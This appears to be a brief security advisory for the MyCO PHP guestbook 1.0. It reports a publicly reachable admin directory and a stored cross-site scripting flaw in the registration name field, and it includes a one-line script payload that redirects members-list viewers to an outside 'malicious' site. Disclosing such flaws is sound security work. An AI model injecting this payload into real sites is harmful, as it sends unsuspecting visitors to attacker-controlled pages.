MyCO multiple vulnerabilities Software: MyCO guestbook 1.0 www.punctweb.com Credit: Revnic Vasile revnic@xxxxxxxxx Description: MyCO is a PHP guestbook that uses a MySQL database Vulnerability: the /admin directory is accessible by everyone. XSS can be injected into the field "Name" when registering a new user. <script>document.location = 'http://some.site/crash_ie.asp';</script> when viewing members list can redirect user's browser to a malicious site.